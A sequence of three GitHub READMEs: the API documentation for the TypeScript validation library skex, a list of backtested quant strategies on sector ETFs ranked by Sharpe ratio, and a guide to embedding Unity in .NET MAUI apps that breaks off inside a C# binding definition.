```ts import {number} from 'skex'; number (); // Matches a number number ().finite (); // Matches a finite number (no Infinity) number ().gt ( 5 ); // Matches a number that is > 5 number ().gte ( 5 ); // Matches a number that is >= 5 number ().min ( 5 ); // Matches a number that is >= 5 number ().integer (); // Matches an integer number ().lt ( 5 ); // Matches a number that is < 5 number ().lte ( 5 ); // Matches a number that is <= 5 number ().max ( 5 ); // Matches a number that is <= 5 number ().multipleOf ( 5 ); // Matches a number that is a multiple of 5 number ().anyOf ([ 1, 2, 3 ]); // Matches a number that is either 1, 2 or 3 number ().noneOf ([ 1, 2, 3 ]); // Matches a number that is neither 1, 2 nor 3 number ().nillable (); // Matches number | null | undefined number ().nullable (); // Matches number | null number ().optional (); // Matches number | undefined ``` #### `string` This op matches a single [String](https://developer.mozilla.org/en-US/docs/Glossary/String). ```ts import {string} from 'skex'; string (); // Matches a string string ().length ( 3 ); // Matches a string of length === 3 string ().min ( 3 ); // Matches a string of length <= 3 string ().max ( 3 ); // Matches a string of length >= 3 string ().matches ( /abc/i ); // Matches a string that matches the regex string ().matches ( isLowercase ); // Matches a string for which this function returns true string ().anyOf ([ 'a', 'b', 'c' ]); // Matches a string that is either 'a', 'b' or 'c' string ().noneOf ([ 'a', 'b', 'c' ]); // Matches a string that is neither 'a', 'b' nor 'c' string ().nillable (); // Matches string | null | undefined string ().nullable (); // Matches string | null string ().optional (); // Matches string | undefined ``` #### `symbol` This op matches a single [Symbol](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol). ```ts import {symbol} from 'skex'; symbol (); // Matches a symbol symbol ().anyOf ([ Symbol.iterator, Symbol.asyncIterator ]); // Matches a symbol that is either Symbol.iterator or Symbol.asyncIterator symbol ().noneOf ([ Symbol.iterator, Symbol.asyncIterator ]); // Matches a symbol that is neither Symbol.iterator nor Symbol.asyncIterator symbol ().nillable (); // Matches symbol | null | undefined symbol ().nullable (); // Matches symbol | null symbol ().optional (); // Matches symbol | undefined ``` #### `undefined` This op matches a single [Undefined](https://developer.mozilla.org/en-US/docs/Glossary/Undefined). ```ts import {undefined} from 'skex'; undefined (); // Matches undefined undefined ().nullable (); // Matches undefined | null ``` ## Compound Ops Compound operators are the internal nodes in your schema graph, they take as input other operators, and combine them to create more complicated schemas. #### `array` This op matches a single [Array](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array), optionally matching all of its items against another schema. 
```ts import {array, number} from 'skex'; array (); // Matches an array with any items array ( number () ); // Matches an array with number items array ().length ( 3 ); // Matches an array of length === 3 array ().min ( 3 ); // Matches an array of length <= 3 array ().max ( 3 ); // Matches an array of length >= 3 array ().items ( number () ); // Matches an array with number items array ().anyOf ([ [1, 2], ['a', 'b'] ]); // Matches an array that is either [1, 2] or ['a', 'b'] array ().noneOf ([ [1, 2], ['a', 'b'] ]); // Matches an array that is neither [1, 2] nor ['a', 'b'] array ().nillable (); // Matches unknown[] | null | undefined array ().nullable (); // Matches unknown[] | null array ().optional (); // Matches unknown[] | undefined ``` #### `tuple` This op matches a single [Array](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array), but where the exact type and index of each item in the array is matched explicit also. ```ts import {tuple, boolean, number, string} from 'skex'; tuple (); // Matches an array with any items tuple ([ number (), string (), boolean () ]); // Matches [number, string, boolean] tuple ([ number (), string ().optional () ]) // Matches [number, string] | [number, undefined] | [number] tuple ().length ( 3 ); // Matches an array of length === 3 tuple ().min ( 3 ); // Matches an array of length <= 3 tuple ().max ( 3 ); // Matches an array of length >= 3 tuple ().items ([ number (), string () ]); // Matches [number, string] tuple ().anyOf ([ [1, 2], ['a', 'b'] ]); // Matches an array that is either [1, 2] or ['a', 'b'] tuple ().noneOf ([ [1, 2], ['a', 'b'] ]); // Matches an array that is neither [1, 2] nor ['a', 'b'] tuple ().nillable (); // Matches unknown[] | null | undefined tuple ().nullable (); // Matches unknown[] | null tuple ().optional (); // Matches unknown[] | undefined ``` #### `object` This op matches a single [Plain Object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object), optionally matching each explicitly provided property with a specific schema. ```ts import {object, number, string} from 'skex'; object (); // Matches an object with any properties object ({ foo: number ().optional (), bar: string ().optional () }); // Matches { foo?: number, bar?: string } object ().properties ({ foo: number () }); // Matches { foo: number } object ().anyOf ([ { foo: 123 }, { bar: 'abc' } ]); // Matches an object that is either { foo: 123 } or { bar: 'abc' } object ().noneOf ([ { foo: 123 }, { bar: 'abc' } ]); // Matches an object that is neither { foo: 123 } nor { bar: 'abc' } object ().nillable (); // Matches {} | null | undefined object ().nullable (); // Matches {} | null object ().optional (); // Matches {} | undefined ``` #### `record` This op matches a single [Plain Object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object), where all values, and optionally all keys also, are matches against specific schemas. 
```ts import {record, number, string} from 'skex'; record (); // Matches an object with any properties record ( number () ); // Matches a Record<string, number> record ( string ().min ( 3 ), number () ); // Matches a Record<string, number> where keys' lengths are >= 3 record ().anyOf ([ { foo: 123 }, { bar: 'abc' } ]); // Matches an object that is either { foo: 123 } or { bar: 'abc' } record ().noneOf ([ { foo: 123 }, { bar: 'abc' } ]); // Matches an object that is neither { foo: 123 } nor { bar: 'abc' } record ().nillable (); // Matches Record<string, unknown> | null | undefined record ().nullable (); // Matches Record<string, unknown> | null record ().optional (); // Matches Record<string, unknown> | undefined ``` #### `nillable` This op accepts [Undefined](https://developer.mozilla.org/en-US/docs/Glossary/Undefined) and [Null](https://developer.mozilla.org/en-US/docs/Glossary/Null) additionally to the type matched by the provided schema. ```ts import {nillable, number} from 'skex'; nillable ( number () ); // Matches number | null | undefined ``` #### `nullable` This op accepts [Null](https://developer.mozilla.org/en-US/docs/Glossary/Null) additionally to the type matched by the provided schema. ```ts import {nullable, number} from 'skex'; nullable ( number () ); // Matches number | null ``` #### `optional` This op accepts [Undefined](https://developer.mozilla.org/en-US/docs/Glossary/Undefined) additionally to the type matched by the provided schema. ```ts import {optional, number} from 'skex'; optional ( number () ); // Matches number | undefined ``` #### `and` This op matches multiple schemas on the same value at the same time. ```ts import {and, number, object, string} from 'skex'; and ([ string ().matches ( /aaa/ ), string ().matches ( /bbb/ ) ]); // Matches a string that matches both regexes and ([ object ({ foo: number () }), object ({ bar: string () }) ]); // Matches { foo: number, bar: string } and ([ object ({ foo: number () }), object ({ bar: string () }) ]).anyOf ([ { foo: 1, bar: 'a' }, { foo: 2, bar: 'b' } ]); // Matches { foo: number, bar: string } but only if { foo: 1, bar: 'a' } or { foo: 2, bar: 'b' } and ([ object ({ foo: number () }), object ({ bar: string () }) ]).noneOf ([ { foo: 1, bar: 'a' }, { foo: 2, bar: 'b' } ]); // Matches { foo: number, bar: string } but only if not { foo: 1, bar: 'a' } nor { foo: 2, bar: 'b' } and ([ object ({ foo: number () }), object ({ bar: string () }) ]).nillable (); // Matches { foo: number, bar: string } | null | undefined and ([ object ({ foo: number () }), object ({ bar: string () }) ]).nullable (); // Matches { foo: number, bar: string } | null and ([ object ({ foo: number () }), object ({ bar: string () }) ]).optional (); // Matches { foo: number, bar: string } | undefined ``` #### `or` This op matches at least one of the provided schemas on the provided value. 
```ts import {or, number, string} from 'skex'; or ([ string (), number () ]); // Matches string | number or ([ string (), number () ]).anyOf ([ 1, 2, 'a', 'b' ]); // Matches a string | number that is either 1, 2, 'a' or 'b' or ([ string (), number () ]).noneOf ([ 1, 2, 'a', 'b' ]); // Matches a string | number that is neither 1, 2, 'a' nor 'b' or ([ string (), number () ]).nillable (); // Matches string | number | null | undefined or ([ string (), number () ]).nullable (); // Matches string | number | null or ([ string (), number () ]).optional (); // Matches string | number | undefined ``` ## Type Ops Special primitive operators that match values with a specific TypeScript-only type. #### `any` This op matches any value, and it asserts it's value to be of type `any`. ```ts import {any} from 'skex'; any (); // Matches anything as any any ().anyOf ([ 1, 2, 3 ]); // Matches anything as any, but allows only 1, 2 or 3 any ().noneOf ([ 1, 2, 3 ]); // Matches anything as any, but disallows 1, 2 and 3 ``` #### `unknown` This op matches any value, and it asserts it's value to be of type `unknown`. ```ts import {unknown} from 'skex'; unknown (); // Matches anything as unknown unknown ().anyOf ([ 1, 2, 3 ]); // Matches anything as unknown, but allows only 1, 2 or 3 unknown ().noneOf ([ 1, 2, 3 ]); // Matches anything as unknown, but disallows 1, 2 and 3 ``` ## Utilities Utilities are not operators, so they are not part of your schemas, but they do useful things with your schemas. #### `serialize` This utility serializes an arbitrary schema to a string. Any schema can be serialized to a string, unless it references symbols or functions, since those can't always be serialized to a string. Among other things serialization can be used to pass a schema between different worker threads. ```ts import {serialize, number} from 'skex'; serialize ( number ().min ( 3 ) ); // => '{"$$schema":"number","$$state":{"gte":3}}' ``` #### `deserialize` This utility deserializes a serialized schema back to into a usable schema. Any serialized schema can be deserialized, unless you are using custom schema ops (for now). ```ts import {serialize, deserialize, number} from 'skex'; const serialized = serialize ( number ().min ( 3 ) ); // => '{"$$schema":"number","$$state":{"gte":3}}' const deserialized = deserialize ( serialized ); // => Basically a clone of number ().min ( 3 ) ``` ## Types The following types are provided to better use the library. #### `Infer` This type allows you to extract the type that a schema matches. Basically it allows you to convert a schema into a type. Interface: ```ts type Infer<T extends Schema> = ReturnType<T['filter']>; ``` Usage: ```ts import {number, object, string} from 'skex'; import type {Infer} from 'skex'; const schema = object ({ foo: string (), bar: number ().optional () }); type Schema = Infer<typeof schema>; // type Schema = { foo: string, bar?: number } ``` #### `Schema` This type matches the general shape of a schema node. 
Interface: ```ts type Schema<T = unknown> = { filter ( value: unknown, defaultable: false, quiet: true ): boolean, filter ( value: unknown, defaultable?: boolean, quiet?: false ): T, filter ( value: unknown, defaultable?: boolean, quiet?: boolean ): T | boolean, get (): Record<string, unknown>, test ( value: unknown ): value is T, traverse ( traverser: ( child: Schema, parent?: Schema, key?: string | number ) => void ): void }; ``` Usage: ```ts import type {Schema} from 'skex'; const matchSchema = <T> ( schema: Schema<T>, value: unknown ): value is T => { return schema.test ( value ); }; ``` ## Examples Some example usages of the library. #### JSON schema This schema matches any valid JSON value. ```ts import * as $ from 'skex'; const primitive = $.or ([ $.boolean (), $.null (), $.number (), $.string () ]); const json = $.or ([ primitive, $.array ( () => json ), $.record ( () => json ) ]); json.test ( '...' ); ``` #### Extract defaults This code extracts default values out of a schema. It makes some assumptions, so it may need to be tweaked for your use case. ```ts const toDefaults = schema => { const defaults = {}; const values = new Map (); schema.traverse ( ( child, parent, key ) => { const valueChild = child.get ( 'default' ) || ( parent ? {} : defaults ); values.set ( child, valueChild ); const valueParent = values.get ( parent ); if ( !valueParent || !key ) return; valueParent[key] = valueChild; }); return defaults; }; const defaults = toDefaults ( schema2 ); // { // editor: { // autosave: { // enabled: true, // interval: 60000 // }, // cursor: { // animated: false, // blinking: 'blink', // style: 'line' // } // } // } ``` #### Extract descriptions This code extracts description values out of a schema. It makes some assumptions, so it may need to be tweaked for your use case. ```ts const toDescriptions = schema => { const descriptions = {}; const values = new Map (); schema.traverse ( ( child, parent, key ) => { const valueChild = child.get ( 'description' ) || ( parent ? {} : descriptions ); values.set ( child, valueChild ); const valueParent = values.get ( parent ); if ( !valueParent || !key ) return; valueParent[key] = valueChild; }); return descriptions; }; const descriptions = toDescriptions ( schema2 ); // { // editor: { // autosave: { // enabled: 'Whether autosaving is enabled or not', // interval: 'The mount of time to wait between autosaves' // }, // cursor: { // animated: 'Whether the cursor should move smoothly between positions or not', // blinking: 'The style used for blinking cursors', // style: 'The style used for rendering cursors' // } // } // } ``` ## License MIT © Fabio Spampinato
16
0
replacementAI/A-Backtest-A-Day
https://github.com/replacementAI/A-Backtest-A-Day
Join me everyday as I backtest a different quant strategy for the markets!
# A Backtest A Day Everyday I will backtest a different quant strategy for the markets! ## Backtested Strategies ### Best Equal Weight Long Only Strategies #### XS Short-term Reversal ![image](https://github.com/replacementAI/A-Backtest-A-Day/assets/55959390/0b92dae3-c490-4b90-be12-49f116aa7a12) | Description (Long Only) | Best Lookback (3 folds) | Sharpe | |------------------------------------------|-------------------------|--------| | [EW XS Long-Only Short-term Reversal][1] | 6 Days | 0.624 | | [EW TS Long-Only Short-term Reversal][2] | 4 Days | 0.595 | | [EW TS Long-Only Mean Reversion][3] | 111 Days | 0.582 | | [EW XS Long-Only Pos Skew][4] | 24 Days | 0.560 | | [EW XS Long-Only Low Vol][5] | 3 Days | 0.548 | | [EW XS Long-Only Pos Kurtosis][6] | 76 Days | 0.537 | | [EW XS Long-Only Neg Skew][7] | 107 Days | 0.504 | | [EW TS Long-Only Momentum][8] | 188 Days | 0.504 | | [EW XS Long-Only Momentum][9] | 124 Days | 0.503 | ### Best Equal Weight Long/Short Strategies #### XS Short-term Reversal ![image](https://github.com/replacementAI/A-Backtest-A-Day/assets/55959390/64de2acd-6530-4f24-9ee3-c44c15f67e91) | Description (Long Short) | Best Lookback (3 folds) | Sharpe | |-------------------------------------|-------------------------|--------| | [EW XS L/S Short-term Reversal][10] | 6 Days | 0.688 | | [EW TS L/S Short-term Reversal][11] | 4 Days | 0.522 | | [EW XS L/S Pos Skew][12] | 24 Days | 0.512 | | [EW TS L/S Mean Reversion][13] | 3 Days | 0.443 | | [EW XS L/S Neg Kurt][14] | 130 Days | 0.384 | | [EW XS L/S Neg Skew][15] | 107 Days | 0.355 | | [EW XS L/S Pos Kurt][16] | 4 Days | 0.288 | | [EW XS L/S Momentum][17] | 124 Days | 0.211 | | [EW TS L/S Momentum][18] | 188 Days | 0.181 | | [EW XS L/S Low Vol][19] | 17 Days | 0.103 | ### Best Ranked Long-Only Strategies #### XS Short-Term Reversal ![image](https://github.com/replacementAI/A-Backtest-A-Day/assets/55959390/8de6b6d0-bdf5-47c2-a6f8-87b632e3e6a9) | Description (Long-only) | Best Lookback (3 folds) | Sharpe | |-------------------------------------------|-------------------------|--------| | [RW XS Long-only Short-Term Reversal][20] | 3 Days | 0.659 | | [RW TS Long-only Short-Term Reversal][21] | 4 Days | 0.626 | | [RW XS Long-only Neg Skew][22] | 111 Days | 0.572 | | [RW XS Long-only Pos Skew][23] | 6 Days | 0.546 | | [RW XS Long-only Pos Kurt][24] | 5 Days | 0.524 | | [RW XS Long-Only Low Vol][25] | 13 Days | 0.513 | | [RW XS Long-only Momentum][26] | 108 Days | 0.444 | | [RW TS Long-only Momentum][27] | 191 Days | 0.439 | | [RW XS Long-only Neg Kurt][28] | 51 Days | 0.433 | ### Best Ranked Long/Short Strategies #### TS Short-term Reversal ![image](https://github.com/replacementAI/A-Backtest-A-Day/assets/55959390/b1ec2cfb-45fb-4e53-8bf1-1dcd393571e4) | Description (Long/Short) | Best Lookback (3 folds) | Sharpe | |-------------------------------------|-------------------------|--------| | [RW XS L/S Short-term Reversal][29] | 3 Days | 0.703 | | [RW TS L/S Short-term Reversal][30] | 4 Days | 0.566 | | [RW XS L/S Neg Skew][31] | 107 Days | 0.419 | | [RW XS L/S Pos Skew][32] | 7 Days | 0.374 | | [RW XS L/S Pos Kurt][33] | 23 Days | 0.268 | | [RW TS L/S Momentum][34] | 251 Days | 0.243 | | [RW XS L/S Low-vol][35] | 3 Days | 0.141 | | [RW XS L/S Neg Kurt][36] | 179 Days | 0.116 | | [RW XS L/S Momentum][37] | 241 Days | 0.033 | ## Methodology The main metric I will be using to measure a strategy is the sharpe ratio. What is the sharpe ratio? ### Sharpe Ratio The sharpe ratio is the average return of a strategy divided by its risk. 
Meaning that if a strategy has high returns and low risk, then it will have a high sharpe ratio. Why this metric and not total profit? Because total profit only keeps track of the returns of a strategy, not its risk, while the sharpe ratio is calculated with both, allowing you to sleep better at night instead of wondering if you are going to make 100% or lose 100% tomorrow. A short code sketch of this calculation is included at the end of this README. ### How to use a strategy yourself 1. Either download the notebook or copy the code into a Python script 2. Remove the end date parameter from yf.download() 3. Print the last row of ```weighted_signal``` using ```print(weighted_signal.iloc[-1])``` (I will update the notebooks to already have this) 4. Go long the positive weights and (if the strategy is L/S) short the negative weights ### Other First I will plot the cumulative return of each strategy over the entire sample, then I will evaluate the sharpe of each strategy in a 3-fold cross-validation to determine the best* parameters. The tickers used are the SPDR sector ETFs: XLE, XLU, XLB, XLK, XLI, XLV, XLF, XLP, and XLY. There are 3 reasons for using these groups of tickers: 1. Removes the survivorship bias problem that comes with using individual tickers 2. These ETFs were launched in 1998, giving a lot of data to work with. 3. Lastly, it is easier for an individual investor to attempt to replicate a strategy using just a few ETFs as opposed to having to run a strategy using (for example) 500 stocks. ## Abbreviations - TS = Time Series - EW = Equal Weight - L\S = Long Short - XS = Cross Sectional - Vol = Volatility - Pos = Positive - Neg = Negative - Opp = Opposite - RW = Rank Weight ## Credits Code was provided by @quant_arb on Twitter; I added the cross-validation to try to better pick parameters. [1]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Short-term%20Reversal.ipynb> [2]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20Long-Only%20Short-term%20Reversal.ipynb> [3]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20Long-Only%20Mean%20Reversion.ipynb> [4]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Pos%20Skew.ipynb> [5]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Low-Vol.ipynb> [6]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Pos%20Kurt.ipynb> [7]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Neg%20Skew.ipynb> [8]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20Long-Only%20Momentum.ipynb> [9]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20Long-Only%20Momentum.ipynb> [10]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Short-term%20Reversal.ipynb> [11]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20L%5CS%20Short-term%20Reversal.ipynb> [12]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Pos%20Skew.ipynb> [13]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20L%5CS%20Mean%20Reversion.ipynb> [14]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Neg%20Kurt.ipynb> [15]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Neg%20Skew.ipynb> [16]: 
<https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Pos%20Kurt.ipynb> [17]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20XS%20L%5CS%20Momentum.ipynb> [18]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW%20TS%20L%5CS%20Momentum.ipynb> [19]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/EW-XS-L%5CS-Low-Vol.ipynb> [20]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-only%20Short-Term%20Reversal.ipynb> [21]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20TS%20Long-Only%20Short-term%20Reversal.ipynb> [22]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-only%20Neg%20Skew.ipynb> [23]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-only%20Pos%20Skew.ipynb> [24]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-Only%20Pos%20Kurtosis.ipynb> [25]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-Only%20Low%20Vol.ipynb> [26]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-only%20Momentum.ipynb> [27]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20TS%20Long-Only%20Momentum.ipynb> [28]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20Long-only%20Neg%20Kurt.ipynb> [29]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Short-term%20Reversal.ipynb> [30]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20TS%20L%5CS%20Short-term%20Reversal.ipynb> [31]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Neg%20Skew.ipynb> [32]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Pos%20Skew.ipynb> [33]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Pos%20Kurt.ipynb> [34]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20TS%20L%5CS%20Momentum.ipynb> [35]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Low-Vol.ipynb> [36]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Neg%20Kurt.ipynb> [37]: <https://github.com/replacementAI/A-Backtest-A-Day/blob/main/Sector/RW%20XS%20L%5CS%20Momentum.ipynb>
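To make the Sharpe ratio definition above concrete, here is a minimal sketch of how it could be computed from a series of daily strategy returns. The 252-trading-day annualisation factor and the omission of a risk-free rate are assumptions added on top of the README's "average return divided by risk" definition.

```python
# Minimal sketch: annualised Sharpe ratio of a daily returns series.
# Assumes 252 trading days per year and ignores the risk-free rate.
import numpy as np
import pandas as pd


def sharpe_ratio(returns: pd.Series, periods_per_year: int = 252) -> float:
    """Average return divided by risk (standard deviation), annualised."""
    return returns.mean() / returns.std() * np.sqrt(periods_per_year)


if __name__ == "__main__":
    # Toy example with random daily strategy returns; in the notebooks the
    # returns would come from the weighted signals applied to the ETF prices.
    rng = np.random.default_rng(0)
    daily_returns = pd.Series(rng.normal(0.0005, 0.01, size=1000))
    print(f"Annualised Sharpe: {sharpe_ratio(daily_returns):.3f}")
```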
10
1
matthewrdev/UnityUaal.Maui
https://github.com/matthewrdev/UnityUaal.Maui
Embedding the Unity game engine into .NET MAUI.
# UnityUaal.Maui This code sample demonstrates how to embed [Unity](https://unity.com) into [.NET MAUI](https://learn.microsoft.com/en-us/dotnet/maui/what-is-maui). <img src="img/unity-maui-embedding.gif" width="30%" height="30%"> See: https://github.com/Unity-Technologies/uaal-example Requires: * Unity (using 23.01.0a20) * Xcode * Android Studio * Visual Studio Mac with MAUI workloads installed Additionally, assumes familiarity with, or at least exposure to: * Native platform development using either Xcode or Android Studio. * .NET development using the Visual Studio family. * Unity development. If you want assistance in doing the Unity => MAUI integration, please reach out via: * Email: [email protected] * LinkedIn: https://www.linkedin.com/in/matthewrdev/ My time is somewhat limited but I'll provide assistance where I can. ## Why Embed Unity Into MAUI? Let's compare the strengths and weaknesses of app development using Unity vs .NET MAUI: **Unity** | Pro | Con | |---|---| | Fully fledged 3D engine | [Multiple In-Engine UI frameworks (no native UI support)](https://docs.unity3d.com/Manual/UI-system-compare.html) | | [Simplified augmented and virtual reality](https://unity.com/unity/features/ar) | Indirect access to native platform features (requires plugin) | | [Rich eco-system of 3D tools, plugins and assets](https://assetstore.unity.com) | [Dated versions of .NET](https://docs.unity3d.com/Manual/dotnetProfileSupport.html) | | | Difficult integration of SQLite | | | Limited Authentication Vendors | | | Highly specialised skillset to hire for. | **MAUI** | Pro | Con | |---|---| | Native UIs in a single language and project | No 3D engine support | | Easily access native features in C# | Access to 3D features requires complex per-platform implementation | | Use latest .NET version | | | Rich ecosystem of packages (nuget.org) | | | "Simple" binding and consumption of native libraries | | While Unity is an incredible platform to create 3D experiences, it is not a good choice for modern, native apps. Unity simplifies building augmented or virtual reality experiences and gives us a full engine for rendering 3D environments; however, its UI frameworks are limited, as is its access to 3rd party vendors. On the other hand, MAUI can create fully native iOS and Android apps. We gain access to the full .NET ecosystem, utilising the latest language features and a large library of NuGet packages. However, creating a 3D experience in MAUI requires writing a 3D rendering pipeline from near scratch... and this is not an easy task! Therefore, by combining these two technologies, we can get the best of both worlds: * Use an industry leader in games/3D technologies. * Fully x-plat code base in a native app. A fully native UI with no restrictions! * .NET across the whole stack. ## Integrating Unity Into MAUI ### Unity Project Overview The [Unity Project](/UnityApp) contains the following: * A single scene with some geometry. * A [script for controlling the camera via touch gestures](/UnityApp/Assets/Scripts/CameraZoom.cs). * A [script that defines APIs for sharing data from Unity to MAUI via the data bridge](/UnityApp/Assets/Scripts/Bridge.cs). * Native plugins for [iOS](/UnityApp/Assets/Plugins/iOS) and [Android](/UnityApp/Assets/Plugins/Android) that define APIs for sharing data from MAUI to Unity via the data bridge. ### Exporting Platform Projects When building a Unity app for Android or iOS, Unity exports it as an Android Gradle project or an Xcode project. 
Each of these projects contains two parts: * The Unity app encapsulated into a standalone library. * The native "shim" project that references the Unity app library and starts it. Please follow the instructions in the Unity As A Library for [iOS](https://github.com/Unity-Technologies/uaal-example/blob/master/docs/ios.md) and [Android](https://github.com/Unity-Technologies/uaal-example/blob/master/docs/android.md) to create the native projects. ### Building Native Frameworks Once you have exported the native projects for iOS and Android, you will need to build the `framework` (iOS) and `aar` (Android) that will be consumed in .NET. **Android** To create the Android aar: * Open the generated gradle project in Android Studio. * Change the build type to `Release` by selecting **Build** => **Select Build Variant** and changing the **:unityLibrary** configuration to **Release** * Select **Build** => **Make Project** The created `aar` will be found under `[Exported Unity App Android Folder]/unityLibrary/build/outputs/aar/unityLibrary-release.aar`. Please note that you may need to install several additional components for Android Studio such as the NDK and cmake. **iOS** To create the iOS framework: * Open the generated project in XCode. * Change the build type to `Release` by selecting **Product** => **Scheme** => **Edit Scheme** and then selecting the **Unity Framework** item from the title of the window, then changing build configuration to **Release**. * Ensuring that the `Data` folder is included into the framework (click on item and set to public) * Ensuring that the Bridge.h is included and can accessed by our iOS binding (click on item and set to public). Make the following modifications to the main.mm and UnityFramework.h file: **Additions to Classes\main.mm** ```` + (UnityFramework*)loadUnity { UnityFramework* ufw = [UnityFramework getInstance]; if (![ufw appController]) { // unity is not initialized //[ufw setExecuteHeader: &_mh_execute_header]; } [ufw setDataBundleId: "com.unity3d.framework"]; return ufw; } - (char**)getArgumentArray { NSArray* args = [[NSProcessInfo processInfo]arguments]; unsigned count = [args count]; char** array = (char **)malloc((count+ 1) * sizeof(char*)); for (unsigned i = 0; i< count; i++) { array[i] = strdup([[args objectAtIndex:i] UTF8String]); } array[count] = NULL; return array; } - (unsigned)getArgumentCount { NSArray* args = [[NSProcessInfo processInfo]arguments]; unsigned count = [args count]; return count; } - (void)freeArray:(char **)array { if (array != NULL) { for (unsigned index = 0; array[index] != NULL; index++) { free(array[index]); } free(array); } } - (void)runEmbedded { char** argv = [self getArgumentArray]; unsigned argc = [self getArgumentCount]; NSDictionary* appLaunchOpts = [[NSDictionary alloc] init]; if (self->runCount) { // initialize from partial unload ( sceneLessMode & onPause ) UnityLoadApplicationFromSceneLessState(); [self pause: false]; [self showUnityWindow]; } else { // full initialization from ground up [self frameworkWarmup: argc argv: argv]; id app = [UIApplication sharedApplication]; id appCtrl = [[NSClassFromString([NSString stringWithUTF8String: AppControllerClassName]) alloc] init]; [appCtrl application: app didFinishLaunchingWithOptions: appLaunchOpts]; [appCtrl applicationWillEnterForeground: app]; [appCtrl applicationDidBecomeActive: app]; } self->runCount += 1; } //this method already exists, just add the difference - (void)unloadApplication { freeArray:([self getArgumentArray]); //added line of code 
UnityUnloadApplication(); } ```` Replace the `unloadApplication` implementation generated by Unity with the one above. **Additions to UnityFramework\UnityFramework.h** ``` + (UnityFramework*)loadUnity; - (void)runEmbedded; ``` These changes make it much simpler for Unity to run in embedded mode in our MAUI app. [Credit](https://github.com/FlorianAuer/Unity_as_a_Library-Xamarin-example/tree/master/UnityProject/buildiOS_modifications) Finally, select **Product** => **Build** to compile and generate the release framework. The created `framework` will be found under `[Exported Unity App iOS Folder]/Build/Products/Release-iphoneos/UnityFramework.framework`. Check that the outputted framework contains the following content: * The `Data` folder in the root of the framework. * The file `Headers/Bridge.h`. ### .NET Native Bindings Once you have built the `framework` and `aar` libraries, you will need to create an Android and iOS binding project alongside the For Android: * Create a new Android .NET binding project. * Create a new folder named **Jars** * Drag and drop the `unityLibrary-release.aar` into the **Jars** folder. For iOS: * Create a new iOS .NET binding project. * Right click on **Native References** and choose **Add Native Reference**. Locate the `UnityFramework.framework` release artifact from the previous step. * Open the ApiDefinition.cs file and replace with the following content: **ApiDefinitions.cs** ``` using System; using CoreAnimation; using Foundation; using ObjCRuntime; using UIKit; namespace iOSBridge { interface IUnityContentReceiver { } [BaseType(typeof(NSObject))] [Model] [Protocol] interface UnityContentReceiver { [Export("receiveUnityContent:eventContent:")] void ReceiveUnityContent ([PlainString] string eventName, [PlainString] string eventContent); } [BaseType(typeof(NSObject))] interface Bridge { [Static, Export("registerUnityContentReceiver:")] void RegisterUnityContentReceiver(IUnityContentReceiver contentReceiver); } [BaseType(typeof(NSObject))] interface UnityAppController : IUIApplicationDelegate { [Export("quitHandler", ArgumentSemantic.Copy)] Action QuitHandler { get; set; } [Export("rootView", ArgumentSemantic.Copy)] UIView RootView { get; } [Export("rootViewController", ArgumentSemantic.Copy)] UIViewController RootViewController { get; } } interface IUnityFrameworkListener { } [BaseType(typeof(NSObject))] [Model] 